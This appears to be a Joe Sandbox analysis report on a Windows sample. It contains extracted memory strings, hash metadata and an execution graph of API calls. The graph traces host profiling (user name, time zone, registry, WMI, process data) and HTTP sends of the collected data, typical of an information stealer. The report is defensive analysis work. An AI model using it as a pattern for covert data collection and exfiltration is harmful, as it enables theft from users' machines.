                                                                                                                                                                                                                                                                                                                    • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoken is, xrefs: 00AE0E51
                                                                                                                                                                                                                                                                                                                    • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinespreadMethodspreadmethodstdDeviationstddeviationstraightphi;succcurlyeq;succnapprox;sun_eu_greeksurfaceScalesurfacescalesweepWaitersthickapprox;tls10defaulttraceStringstransmit, xrefs: 00AE0D99
                                                                                                                                                                                                                                                                                                                    • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestBernoullis;BoundIm, xrefs: 00AE0E07
                                                                                                                                                                                                                                                                                                                    • m->p= max= min= next= null p->m= prev= span=% util%%%02x%s: %s%v: %s(...), i = , not , val .reloc390625<-chanAElig;AacuteAcirc;AgraveAlpha;Amacr;AnswerAogon;ArabicAring;AtildeAugustBrahmiBreve;CANCELCarianCcedilCcirc;ChakmaColon;CommonCopticCross;DaggerDa, xrefs: 00AE0DBB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1624821709.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_S0FTWARE.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2005891860
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2f57faa167a52eeb23b4750f53b99bb820b313c32728eae394241b55e02c669b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 94027ff4e524aefd3417b396aa125b1d22e764eb4bb77135d12d5c2d98415bdb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f57faa167a52eeb23b4750f53b99bb820b313c32728eae394241b55e02c669b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B731F5B4508745CFD304EF64C295B5ABBE0BF88704F05896EE8998B352D774D888DFA2

Execution Graph

Execution Coverage:4.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:4.3%
Total number of Nodes:2000
Total number of Limit Nodes:26
HttpOpenRequestA 73824->73825 73826 8e4cff 73825->73826 73827 8e50b0 InternetCloseHandle 73825->73827 73828 8e4d07 InternetSetOptionA 73826->73828 73829 8e4d23 73826->73829 73827->73788 73828->73829 73830 8f2265 3 API calls 73829->73830 73831 8e4d39 73830->73831 73832 8f21e9 lstrcpy 73831->73832 73833 8e4d44 73832->73833 73834 8f2223 2 API calls 73833->73834 73835 8e4d66 73834->73835 73836 8f21e9 lstrcpy 73835->73836 73837 8e4d71 73836->73837 73838 8f2265 3 API calls 73837->73838 73839 8e4d92 73838->73839 73840 8f21e9 lstrcpy 73839->73840 73841 8e4d9d 73840->73841 73842 8f2265 3 API calls 73841->73842 73843 8e4dbf 73842->73843 73844 8f21e9 lstrcpy 73843->73844 73845 8e4dca 73844->73845 73846 8f2265 3 API calls 73845->73846 73847 8e4deb 73846->73847 73848 8f21e9 lstrcpy 73847->73848 73849 8e4df6 73848->73849 73850 8f2265 3 API calls 73849->73850 73851 8e4e17 73850->73851 73852 8f21e9 lstrcpy 73851->73852 73853 8e4e22 73852->73853 73854 8f2223 2 API calls 73853->73854 73855 8e4e41 73854->73855 73856 8f21e9 lstrcpy 73855->73856 73857 8e4e4c 73856->73857 73858 8f2265 3 API calls 73857->73858 73859 8e4e6d 73858->73859 73860 8f21e9 lstrcpy 73859->73860 73861 8e4e78 73860->73861 73862 8f2265 3 API calls 73861->73862 73863 8e4e99 73862->73863 73864 8f21e9 lstrcpy 73863->73864 73865 8e4ea4 73864->73865 73866 8f2223 2 API calls 73865->73866 73867 8e4ec6 73866->73867 73868 8f21e9 lstrcpy 73867->73868 73869 8e4ed1 73868->73869 73870 8f2265 3 API calls 73869->73870 73871 8e4ef2 73870->73871 73872 8f21e9 lstrcpy 73871->73872 73873 8e4efd 73872->73873 73874 8f2265 3 API calls 73873->73874 73875 8e4f1f 73874->73875 73876 8f21e9 lstrcpy 73875->73876 73877 8e4f2a 73876->73877 73878 8f2265 3 API calls 73877->73878 73879 8e4f4b 73878->73879 73880 8f21e9 lstrcpy 73879->73880 73881 8e4f56 73880->73881 73882 8f2265 3 API calls 73881->73882 73883 8e4f77 73882->73883 73884 8f21e9 lstrcpy 73883->73884 73885 8e4f82 73884->73885 73886 8f2223 2 API calls 73885->73886 73887 8e4fa1 73886->73887 
73888 8f21e9 lstrcpy 73887->73888 73889 8e4fac 73888->73889 73890 8f2143 lstrcpy 73889->73890 73891 8e4fc7 73890->73891 73892 8f2223 2 API calls 73891->73892 73893 8e4fde 73892->73893 73894 8f2223 2 API calls 73893->73894 73895 8e4fef 73894->73895 73896 8f21e9 lstrcpy 73895->73896 73897 8e4ffa 73896->73897 73898 8e5010 lstrlen lstrlen HttpSendRequestA 73897->73898 73899 8e5084 InternetReadFile 73898->73899 73900 8e509e InternetCloseHandle 73899->73900 73903 8e5044 73899->73903 73901 8e2910 73900->73901 73901->73827 73902 8f2265 3 API calls 73902->73903 73903->73899 73903->73900 73903->73902 73904 8f21e9 lstrcpy 73903->73904 73904->73903 73906 8f571e ExitProcess 73905->73906 73907 8f5725 strtok_s 73905->73907 73908 8f5885 73907->73908 73909 8f5741 73907->73909 73908->72896 73910 8f5867 strtok_s 73909->73910 73911 8f575e StrCmpCA 73909->73911 73912 8f57dc StrCmpCA 73909->73912 73913 8f581b StrCmpCA 73909->73913 73914 8f577a StrCmpCA 73909->73914 73915 8f5796 StrCmpCA 73909->73915 73916 8f5806 StrCmpCA 73909->73916 73917 8f5853 StrCmpCA 73909->73917 73918 8f57b2 StrCmpCA 73909->73918 73919 8f57f1 StrCmpCA 73909->73919 73920 8f5831 StrCmpCA 73909->73920 73921 8f21a5 2 API calls 73909->73921 73910->73908 73910->73909 73911->73909 73911->73910 73912->73909 73912->73910 73913->73910 73914->73909 73914->73910 73915->73909 73915->73910 73916->73909 73916->73910 73917->73910 73918->73909 73918->73910 73919->73909 73919->73910 73920->73910 73921->73909 73923 8f2175 lstrcpy 73922->73923 73924 8e5e8c 73923->73924 73925 8e49de 5 API calls 73924->73925 73926 8e5e98 73925->73926 73927 8f2143 lstrcpy 73926->73927 73928 8e5eb4 73927->73928 73929 8f2143 lstrcpy 73928->73929 73930 8e5ec4 73929->73930 73931 8f2143 lstrcpy 73930->73931 73932 8e5ed4 73931->73932 73933 8f2143 lstrcpy 73932->73933 73934 8e5ee4 73933->73934 73935 8f2143 lstrcpy 73934->73935 73936 8e5ef4 InternetOpenA StrCmpCA 73935->73936 73937 8e5f28 73936->73937 73938 8e663e InternetCloseHandle 73937->73938 73940 8f38a6 7 
API calls 73937->73940 74772 8e91ff 73938->74772 73942 8e5f48 73940->73942 73941 8e665f 73944 8f21a5 2 API calls 73941->73944 73956 8e668b 73941->73956 73943 8f2223 2 API calls 73942->73943 73945 8e5f5b 73943->73945 73946 8e6671 73944->73946 73947 8f21e9 lstrcpy 73945->73947 73948 8f2265 3 API calls 73946->73948 73951 8e5f66 73947->73951 73949 8e6684 73948->73949 73950 8f21e9 lstrcpy 73949->73950 73950->73956 73952 8f2265 3 API calls 73951->73952 73953 8e5f92 73952->73953 73954 8f21e9 lstrcpy 73953->73954 73955 8e5f9d 73954->73955 73958 8f2265 3 API calls 73955->73958 73957 8fe88c ___crtMessageBoxW 5 API calls 73956->73957 73959 8e6717 73957->73959 73960 8e5fbe 73958->73960 74090 8f514a strtok_s 73959->74090 73961 8f21e9 lstrcpy 73960->73961 73962 8e5fc9 73961->73962 73963 8f2223 2 API calls 73962->73963 73964 8e5feb 73963->73964 73965 8f21e9 lstrcpy 73964->73965 73966 8e5ff6 73965->73966 73967 8f2265 3 API calls 73966->73967 73968 8e6017 73967->73968 73969 8f21e9 lstrcpy 73968->73969 73970 8e6022 73969->73970 73971 8f2265 3 API calls 73970->73971 73972 8e6043 73971->73972 73973 8f21e9 lstrcpy 73972->73973 73974 8e604e 73973->73974 73975 8f2265 3 API calls 73974->73975 73976 8e6070 73975->73976 73977 8f2223 2 API calls 73976->73977 73978 8e607b 73977->73978 73979 8f21e9 lstrcpy 73978->73979 73980 8e6086 73979->73980 73981 8e609c InternetConnectA 73980->73981 73982 8e60ca HttpOpenRequestA 73981->73982 73983 8e6638 73981->73983 73984 8e610e 73982->73984 73985 8e662c InternetCloseHandle 73982->73985 73983->73938 73986 8e6116 InternetSetOptionA 73984->73986 73987 8e6132 73984->73987 73985->73983 73986->73987 73988 8f2265 3 API calls 73987->73988 73989 8e6148 73988->73989 73990 8f21e9 lstrcpy 73989->73990 73991 8e6153 73990->73991 73992 8f2223 2 API calls 73991->73992 73993 8e6175 73992->73993 73994 8f21e9 lstrcpy 73993->73994 73995 8e6180 73994->73995 73996 8f2265 3 API calls 73995->73996 73997 8e61a1 73996->73997 73998 8f21e9 lstrcpy 73997->73998 73999 8e61ac 
73998->73999 74000 8f2265 3 API calls 73999->74000 74001 8e61ce 74000->74001 74002 8f21e9 lstrcpy 74001->74002 74003 8e61d9 74002->74003 74004 8f2265 3 API calls 74003->74004 74005 8e61fb 74004->74005 74006 8f21e9 lstrcpy 74005->74006 74007 8e6206 74006->74007 74008 8f2265 3 API calls 74007->74008 74009 8e6227 74008->74009 74010 8f21e9 lstrcpy 74009->74010 74011 8e6232 74010->74011 74012 8f2223 2 API calls 74011->74012 74013 8e6251 74012->74013 74014 8f21e9 lstrcpy 74013->74014 74015 8e625c 74014->74015 74016 8f2265 3 API calls 74015->74016 74017 8e627d 74016->74017 74018 8f21e9 lstrcpy 74017->74018 74019 8e6288 74018->74019 74020 8f2265 3 API calls 74019->74020 74021 8e62a9 74020->74021 74022 8f21e9 lstrcpy 74021->74022 74023 8e62b4 74022->74023 74024 8f2223 2 API calls 74023->74024 74025 8e62d6 74024->74025 74026 8f21e9 lstrcpy 74025->74026 74027 8e62e1 74026->74027 74028 8f2265 3 API calls 74027->74028 74029 8e6302 74028->74029 74030 8f21e9 lstrcpy 74029->74030 74031 8e630d 74030->74031 74032 8f2265 3 API calls 74031->74032 74033 8e632f 74032->74033 74034 8f21e9 lstrcpy 74033->74034 74035 8e633a 74034->74035 74036 8f2265 3 API calls 74035->74036 74037 8e635b 74036->74037 74038 8f21e9 lstrcpy 74037->74038 74039 8e6366 74038->74039 74040 8f2265 3 API calls 74039->74040 74041 8e6387 74040->74041 74042 8f21e9 lstrcpy 74041->74042 74043 8e6392 74042->74043 74044 8f2265 3 API calls 74043->74044 74045 8e63b3 74044->74045 74046 8f21e9 lstrcpy 74045->74046 74047 8e63be 74046->74047 74048 8f2265 3 API calls 74047->74048 74049 8e63df 74048->74049 74050 8f21e9 lstrcpy 74049->74050 74051 8e63ea 74050->74051 74052 8f2265 3 API calls 74051->74052 74053 8e640b 74052->74053 74054 8f21e9 lstrcpy 74053->74054 74055 8e6416 74054->74055 74056 8f2223 2 API calls 74055->74056 74057 8e6432 74056->74057 74058 8f21e9 lstrcpy 74057->74058 74059 8e643d 74058->74059 74060 8f2265 3 API calls 74059->74060 74061 8e645e 74060->74061 74062 8f21e9 lstrcpy 74061->74062 74063 8e6469 74062->74063 
74064 8f2265 3 API calls 74063->74064 74065 8e648b 74064->74065 74066 8f21e9 lstrcpy 74065->74066 74067 8e6496 74066->74067 74068 8f2265 3 API calls 74067->74068 74069 8e64b7 74068->74069 74070 8f21e9 lstrcpy 74069->74070 74071 8e64c2 74070->74071 74072 8f2265 3 API calls 74071->74072 74073 8e64e3 74072->74073 74074 8f21e9 lstrcpy 74073->74074 74075 8e64ee 74074->74075 74076 8f2223 2 API calls 74075->74076 74077 8e650d 74076->74077 74078 8f21e9 lstrcpy 74077->74078 74079 8e6518 74078->74079 74080 8e6523 lstrlen lstrlen GetProcessHeap RtlAllocateHeap lstrlen 74079->74080 74770 9088d0 74080->74770 74082 8e6569 lstrlen lstrlen 74083 9088d0 _memmove 74082->74083 74084 8e6592 lstrlen HttpSendRequestA 74083->74084 74085 8e6601 InternetReadFile 74084->74085 74086 8e6620 InternetCloseHandle 74085->74086 74088 8e65c2 74085->74088 74086->73985 74087 8f2265 3 API calls 74087->74088 74088->74085 74088->74086 74088->74087 74089 8f21e9 lstrcpy 74088->74089 74089->74088 74091 8f51f1 74090->74091 74092 8f5176 74090->74092 74091->72904 74093 8f21a5 2 API calls 74092->74093 74094 8f51d7 strtok_s 74092->74094 74095 8f21a5 2 API calls 74092->74095 74093->74094 74094->74091 74094->74092 74095->74092 74099 8f4ed4 74096->74099 74097 8f4f80 StrCmpCA 74097->74099 74098 8f4fd3 74098->72912 74099->74097 74099->74098 74100 8f21a5 2 API calls 74099->74100 74101 8f4fb5 strtok_s 74099->74101 74102 8f4f4f StrCmpCA 74099->74102 74103 8f4f2a StrCmpCA 74099->74103 74104 8f4ef9 StrCmpCA 74099->74104 74100->74099 74101->74099 74102->74099 74103->74099 74104->74099 74106 8f5083 74105->74106 74107 8f500b 74105->74107 74106->72920 74108 8f5031 StrCmpCA 74107->74108 74109 8f21a5 2 API calls 74107->74109 74110 8f5069 strtok_s 74107->74110 74111 8f21a5 2 API calls 74107->74111 74108->74107 74109->74110 74110->74106 74110->74107 74111->74107 74113 8f2143 lstrcpy 74112->74113 74114 8f58dc 74113->74114 74115 8f2265 3 API calls 74114->74115 74116 8f58ec 74115->74116 74117 8f21e9 lstrcpy 74116->74117 74118 
8f58f4 74117->74118 74119 8f2265 3 API calls 74118->74119 74120 8f590c 74119->74120 74121 8f21e9 lstrcpy 74120->74121 74122 8f5914 74121->74122 74123 8f2265 3 API calls 74122->74123 74124 8f592c 74123->74124 74125 8f21e9 lstrcpy 74124->74125 74126 8f5934 74125->74126 74127 8f2265 3 API calls 74126->74127 74128 8f594c 74127->74128 74129 8f21e9 lstrcpy 74128->74129 74130 8f5954 74129->74130 74131 8f2265 3 API calls 74130->74131 74132 8f596c 74131->74132 74133 8f21e9 lstrcpy 74132->74133 74134 8f5974 74133->74134 74776 8f291c GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 74134->74776 74137 8f2265 3 API calls 74138 8f598d 74137->74138 74139 8f21e9 lstrcpy 74138->74139 74140 8f5995 74139->74140 74141 8f2265 3 API calls 74140->74141 74142 8f59ad 74141->74142 74143 8f21e9 lstrcpy 74142->74143 74144 8f59b5 74143->74144 74145 8f2265 3 API calls 74144->74145 74146 8f59cd 74145->74146 74147 8f21e9 lstrcpy 74146->74147 74148 8f59d5 74147->74148 74779 8f3230 74148->74779 74151 8f2265 3 API calls 74152 8f59ee 74151->74152 74153 8f21e9 lstrcpy 74152->74153 74154 8f59f6 74153->74154 74155 8f2265 3 API calls 74154->74155 74156 8f5a0e 74155->74156 74157 8f21e9 lstrcpy 74156->74157 74158 8f5a16 74157->74158 74159 8f2265 3 API calls 74158->74159 74160 8f5a2e 74159->74160 74161 8f21e9 lstrcpy 74160->74161 74162 8f5a36 74161->74162 74163 8f32e0 11 API calls 74162->74163 74164 8f5a46 74163->74164 74165 8f2223 2 API calls 74164->74165 74166 8f5a53 74165->74166 74167 8f21e9 lstrcpy 74166->74167 74168 8f5a5b 74167->74168 74169 8f2265 3 API calls 74168->74169 74170 8f5a7b 74169->74170 74171 8f21e9 lstrcpy 74170->74171 74172 8f5a83 74171->74172 74173 8f2265 3 API calls 74172->74173 74174 8f5a9b 74173->74174 74175 8f21e9 lstrcpy 74174->74175 74176 8f5aa3 74175->74176 74177 8f25fe 19 API calls 74176->74177 74178 8f5ab3 74177->74178 74179 8f2223 2 API calls 74178->74179 74180 8f5ac0 74179->74180 74181 8f21e9 lstrcpy 74180->74181 74182 8f5ac8 74181->74182 74183 8f2265 3 API calls 
74182->74183 74184 8f5ae8 74183->74184 74185 8f21e9 lstrcpy 74184->74185 74186 8f5af0 74185->74186 74187 8f2265 3 API calls 74186->74187 74188 8f5b08 74187->74188 74189 8f21e9 lstrcpy 74188->74189 74190 8f5b10 74189->74190 74191 8f5b18 GetCurrentProcessId 74190->74191 74786 8f3ee1 OpenProcess 74191->74786 74194 8f2223 2 API calls 74195 8f5b35 74194->74195 74196 8f21e9 lstrcpy 74195->74196 74197 8f5b3d 74196->74197 74198 8f2265 3 API calls 74197->74198 74199 8f5b5d 74198->74199 74200 8f21e9 lstrcpy 74199->74200 74201 8f5b65 74200->74201 74202 8f2265 3 API calls 74201->74202 74203 8f5b7d 74202->74203 74204 8f21e9 lstrcpy 74203->74204 74205 8f5b85 74204->74205 74206 8f2265 3 API calls 74205->74206 74207 8f5b9d 74206->74207 74208 8f21e9 lstrcpy 74207->74208 74209 8f5ba5 74208->74209 74210 8f2265 3 API calls 74209->74210 74211 8f5bbd 74210->74211 74212 8f21e9 lstrcpy 74211->74212 74213 8f5bc5 74212->74213 74793 8f278c GetProcessHeap RtlAllocateHeap 74213->74793 74216 8f2265 3 API calls 74217 8f5bde 74216->74217 74218 8f21e9 lstrcpy 74217->74218 74219 8f5be6 74218->74219 74220 8f2265 3 API calls 74219->74220 74221 8f5bfe 74220->74221 74222 8f21e9 lstrcpy 74221->74222 74223 8f5c06 74222->74223 74224 8f2265 3 API calls 74223->74224 74225 8f5c1e 74224->74225 74226 8f21e9 lstrcpy 74225->74226 74227 8f5c26 74226->74227 74800 8f3463 74227->74800 74230 8f2223 2 API calls 74231 8f5c43 74230->74231 74232 8f21e9 lstrcpy 74231->74232 74233 8f5c4b 74232->74233 74234 8f2265 3 API calls 74233->74234 74235 8f5c6b 74234->74235 74236 8f21e9 lstrcpy 74235->74236 74237 8f5c73 74236->74237 74238 8f2265 3 API calls 74237->74238 74239 8f5c8b 74238->74239 74240 8f21e9 lstrcpy 74239->74240 74241 8f5c93 74240->74241 74817 8f35f3 74241->74817 74243 8f5ca4 74244 8f2223 2 API calls 74243->74244 74245 8f5cb2 74244->74245 74246 8f21e9 lstrcpy 74245->74246 74247 8f5cba 74246->74247 74248 8f2265 3 API calls 74247->74248 74249 8f5cda 74248->74249 74250 8f21e9 lstrcpy 74249->74250 74251 8f5ce2 
74250->74251 74252 8f2265 3 API calls 74251->74252 74253 8f5cfa 74252->74253 74254 8f21e9 lstrcpy 74253->74254 74255 8f5d02 74254->74255 74256 8f28e1 3 API calls 74255->74256 74257 8f5d0f 74256->74257 74258 8f2265 3 API calls 74257->74258 74259 8f5d1b 74258->74259 74260 8f21e9 lstrcpy 74259->74260 74261 8f5d23 74260->74261 74262 8f2265 3 API calls 74261->74262 74263 8f5d3b 74262->74263 74264 8f21e9 lstrcpy 74263->74264 74265 8f5d43 74264->74265 74266 8f2265 3 API calls 74265->74266 74267 8f5d5b 74266->74267 74268 8f21e9 lstrcpy 74267->74268 74269 8f5d63 74268->74269 74832 8f28af GetProcessHeap RtlAllocateHeap GetUserNameA 74269->74832 74271 8f5d70 74272 8f2265 3 API calls 74271->74272 74273 8f5d7c 74272->74273 74274 8f21e9 lstrcpy 74273->74274 74275 8f5d84 74274->74275 74276 8f2265 3 API calls 74275->74276 74277 8f5d9c 74276->74277 74278 8f21e9 lstrcpy 74277->74278 74279 8f5da4 74278->74279 74280 8f2265 3 API calls 74279->74280 74281 8f5dbc 74280->74281 74282 8f21e9 lstrcpy 74281->74282 74283 8f5dc4 74282->74283 74833 8f31bf 7 API calls 74283->74833 74286 8f2223 2 API calls 74287 8f5de3 74286->74287 74288 8f21e9 lstrcpy 74287->74288 74289 8f5deb 74288->74289 74290 8f2265 3 API calls 74289->74290 74291 8f5e0b 74290->74291 74292 8f21e9 lstrcpy 74291->74292 74293 8f5e13 74292->74293 74294 8f2265 3 API calls 74293->74294 74295 8f5e2b 74294->74295 74296 8f21e9 lstrcpy 74295->74296 74297 8f5e33 74296->74297 74836 8f2a37 74297->74836 74300 8f2223 2 API calls 74301 8f5e50 74300->74301 74302 8f21e9 lstrcpy 74301->74302 74303 8f5e58 74302->74303 74304 8f2265 3 API calls 74303->74304 74305 8f5e78 74304->74305 74306 8f21e9 lstrcpy 74305->74306 74307 8f5e80 74306->74307 74308 8f2265 3 API calls 74307->74308 74309 8f5e98 74308->74309 74310 8f21e9 lstrcpy 74309->74310 74311 8f5ea0 74310->74311 74312 8f291c 9 API calls 74311->74312 74313 8f5ead 74312->74313 74314 8f2265 3 API calls 74313->74314 74315 8f5eb9 74314->74315 74316 8f21e9 lstrcpy 74315->74316 74317 8f5ec1 74316->74317 
74318 8f2265 3 API calls 74317->74318 74319 8f5ed9 74318->74319 74320 8f21e9 lstrcpy 74319->74320 74321 8f5ee1 74320->74321 74322 8f2265 3 API calls 74321->74322 74323 8f5ef9 74322->74323 74324 8f21e9 lstrcpy 74323->74324 74325 8f5f01 74324->74325 74848 8f298a GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 74325->74848 74328 8f2265 3 API calls 74329 8f5f1a 74328->74329 74330 8f21e9 lstrcpy 74329->74330 74331 8f5f22 74330->74331 74332 8f2265 3 API calls 74331->74332 74333 8f5f3a 74332->74333 74334 8f21e9 lstrcpy 74333->74334 74335 8f5f42 74334->74335 74336 8f2265 3 API calls 74335->74336 74337 8f5f5a 74336->74337 74338 8f21e9 lstrcpy 74337->74338 74339 8f5f62 74338->74339 74340 8f2265 3 API calls 74339->74340 74341 8f5f7a 74340->74341 74342 8f21e9 lstrcpy 74341->74342 74343 8f5f82 74342->74343 74853 8f2bad GetProcessHeap RtlAllocateHeap RegOpenKeyExA 74343->74853 74345 8f5f8f 74346 8f2265 3 API calls 74345->74346 74347 8f5f9b 74346->74347 74348 8f21e9 lstrcpy 74347->74348 74349 8f5fa3 74348->74349 74350 8f2265 3 API calls 74349->74350 74351 8f5fbb 74350->74351 74352 8f21e9 lstrcpy 74351->74352 74353 8f5fc3 74352->74353 74354 8f2265 3 API calls 74353->74354 74355 8f5fdb 74354->74355 74356 8f21e9 lstrcpy 74355->74356 74357 8f5fe3 74356->74357 74856 8f2c63 74357->74856 74360 8f2265 3 API calls 74361 8f5ffc 74360->74361 74362 8f21e9 lstrcpy 74361->74362 74363 8f6004 74362->74363 74364 8f2265 3 API calls 74363->74364 74365 8f601c 74364->74365 74366 8f21e9 lstrcpy 74365->74366 74367 8f6024 74366->74367 74368 8f2265 3 API calls 74367->74368 74369 8f603c 74368->74369 74370 8f21e9 lstrcpy 74369->74370 74371 8f6044 74370->74371 74871 8f2c16 GetSystemInfo wsprintfA 74371->74871 74374 8f2265 3 API calls 74375 8f605d 74374->74375 74376 8f21e9 lstrcpy 74375->74376 74377 8f6065 74376->74377 74378 8f2265 3 API calls 74377->74378 74379 8f607d 74378->74379 74380 8f21e9 lstrcpy 74379->74380 74381 8f6085 74380->74381 74382 8f2265 3 API calls 74381->74382 74383 8f609d 
74382->74383 74384 8f21e9 lstrcpy 74383->74384 74385 8f60a5 74384->74385 74874 8f2d75 GetProcessHeap RtlAllocateHeap 74385->74874 74388 8f2265 3 API calls 74389 8f60be 74388->74389 74390 8f21e9 lstrcpy 74389->74390 74391 8f60c6 74390->74391 74392 8f2265 3 API calls 74391->74392 74393 8f60e1 74392->74393 74394 8f21e9 lstrcpy 74393->74394 74395 8f60e9 74394->74395 74396 8f2265 3 API calls 74395->74396 74397 8f6104 74396->74397 74398 8f21e9 lstrcpy 74397->74398 74399 8f610c 74398->74399 74881 8f2dee 74399->74881 74402 8f2223 2 API calls 74403 8f612c 74402->74403 74404 8f21e9 lstrcpy 74403->74404 74405 8f6134 74404->74405 74406 8f2265 3 API calls 74405->74406 74407 8f6157 74406->74407 74408 8f21e9 lstrcpy 74407->74408 74409 8f615f 74408->74409 74410 8f2265 3 API calls 74409->74410 74411 8f6177 74410->74411 74412 8f21e9 lstrcpy 74411->74412 74413 8f617f 74412->74413 74889 8f3101 74413->74889 74416 8f2223 2 API calls 74417 8f619f 74416->74417 74418 8f21e9 lstrcpy 74417->74418 74419 8f61a7 74418->74419 74420 8f2265 3 API calls 74419->74420 74421 8f61cd 74420->74421 74422 8f21e9 lstrcpy 74421->74422 74423 8f61d5 74422->74423 74424 8f2265 3 API calls 74423->74424 74425 8f61f0 74424->74425 74426 8f21e9 lstrcpy 74425->74426 74427 8f61f8 74426->74427 74899 8f2e5f 74427->74899 74430 8f2223 2 API calls 74431 8f621d 74430->74431 74432 8f21e9 lstrcpy 74431->74432 74433 8f6225 74432->74433 74434 8f2e5f 21 API calls 74433->74434 74435 8f6246 74434->74435 74436 8f2223 2 API calls 74435->74436 74437 8f6255 74436->74437 74438 8f21e9 lstrcpy 74437->74438 74439 8f625d 74438->74439 74440 8f2265 3 API calls 74439->74440 74441 8f6280 74440->74441 74442 8f21e9 lstrcpy 74441->74442 74443 8f6288 74442->74443 74444 8e1ced lstrcpy 74443->74444 74445 8f629d lstrlen 74444->74445 74446 8f2143 lstrcpy 74445->74446 74447 8f62ba 74446->74447 74919 8f8be6 74447->74919 74449 8f62c3 74449->72924 74451 8f2175 lstrcpy 74450->74451 74452 8e5182 74451->74452 74453 8e49de 5 API calls 74452->74453 74454 8e518e 
GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 74453->74454 74455 8e51f3 74454->74455 74456 8e5373 InternetCloseHandle 74455->74456 74457 8e5201 InternetConnectA 74455->74457 74460 8e52c6 74456->74460 74458 8e522d HttpOpenRequestA 74457->74458 74459 8e5367 InternetCloseHandle 74457->74459 74461 8e526e 74458->74461 74462 8e535b InternetCloseHandle 74458->74462 74459->74456 74465 8fe88c ___crtMessageBoxW 5 API calls 74460->74465 74463 8e528e HttpSendRequestA HttpQueryInfoA 74461->74463 74464 8e5272 InternetSetOptionA 74461->74464 74462->74459 74463->74460 74466 8e52e3 74463->74466 74464->74463 74467 8e53a8 74465->74467 74466->74462 74468 8e52e9 InternetReadFile 74466->74468 74467->72931 74468->74462 74468->74466 75172 8e902f 74469->75172 74488 8efad4 74728 8f2143 lstrcpy 74727->74728 74729 8e29f5 74728->74729 74729->73686 74731 8f2143 lstrcpy 74730->74731 74732 8e2a06 74731->74732 74732->73686 74734 8f2143 lstrcpy 74733->74734 74735 8e2a17 74734->74735 74735->73686 74737 8f2175 lstrcpy 74736->74737 74738 8f8afb 74737->74738 74739 8f2175 lstrcpy 74738->74739 74740 8f8b06 74739->74740 74741 8f2175 lstrcpy 74740->74741 74742 8f8b11 74741->74742 74742->73742 74743->73686 74744->73686 74745->73686 74747 8f3309 74746->74747 74748 8f3398 74746->74748 74750 8f2143 lstrcpy 74747->74750 74749 8f2143 lstrcpy 74748->74749 74751 8f33a4 74749->74751 74752 8f331c _memset 74750->74752 74753 8fe88c ___crtMessageBoxW 5 API calls 74751->74753 74763 8f421b lstrcpy malloc strncpy 74752->74763 74754 8f33b1 74753->74754 74754->73763 74756 8f3346 lstrcat 74764 8e2910 74756->74764 74758 8f3363 lstrcat 74759 8f3380 74758->74759 74760 8f2143 lstrcpy 74759->74760 74761 8f338e 74760->74761 74761->74751 74762->73766 74763->74756 74765 8e2914 74764->74765 74765->74758 74767 8e49ec 74766->74767 74767->74767 74768 8e49f3 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlen InternetCrackUrlA 74767->74768 74769 8e4a4f 74768->74769 74769->73776 74771 9088e8 74770->74771 74771->74082 74771->74771 74774 
8e920e LocalAlloc 74772->74774 74775 8e924a 74774->74775 74775->73941 74777 8fe88c ___crtMessageBoxW 5 API calls 74776->74777 74778 8f2988 74777->74778 74778->74137 74936 905490 74779->74936 74781 8f3268 RegOpenKeyExA 74782 8f32ad RegCloseKey CharToOemA 74781->74782 74783 8f328c RegQueryValueExA 74781->74783 74784 8fe88c ___crtMessageBoxW 5 API calls 74782->74784 74783->74782 74785 8f32de 74784->74785 74785->74151 74787 8f3f0f K32GetModuleFileNameExA CloseHandle 74786->74787 74788 8f3f2b 74786->74788 74787->74788 74789 8f2143 lstrcpy 74788->74789 74790 8f3f37 74789->74790 74791 8fe88c ___crtMessageBoxW 5 API calls 74790->74791 74792 8f3f45 74791->74792 74792->74194 74938 8f2872 74793->74938 74796 8f27bf RegOpenKeyExA 74798 8f27df RegQueryValueExA 74796->74798 74799 8f27f7 RegCloseKey 74796->74799 74797 8f27b8 74797->74216 74798->74799 74799->74797 74945 910989 74800->74945 74802 8f346f CoInitializeEx CoInitializeSecurity CoCreateInstance 74803 8f34c7 74802->74803 74804 8f34cf CoSetProxyBlanket 74803->74804 74807 8f35c0 74803->74807 74810 8f34ff 74804->74810 74805 8f2143 lstrcpy 74806 8f35eb 74805->74806 74954 9109e5 74806->74954 74807->74805 74810->74807 74811 8f3533 VariantInit 74810->74811 74812 8f3552 74811->74812 74946 8f33b3 74812->74946 74814 8f355d FileTimeToSystemTime GetProcessHeap RtlAllocateHeap wsprintfA 74815 8f2143 lstrcpy 74814->74815 74816 8f35b4 VariantClear 74815->74816 74816->74806 74958 91091d 74817->74958 74819 8f35ff CoInitializeEx CoInitializeSecurity CoCreateInstance 74820 8f3655 74819->74820 74821 8f365d CoSetProxyBlanket 74820->74821 74824 8f36ef 74820->74824 74825 8f368d 74821->74825 74822 8f2143 lstrcpy 74823 8f371a 74822->74823 74823->74243 74824->74822 74825->74824 74826 8f36b5 VariantInit 74825->74826 74827 8f36d4 74826->74827 74959 8f399e LocalAlloc CharToOemW 74827->74959 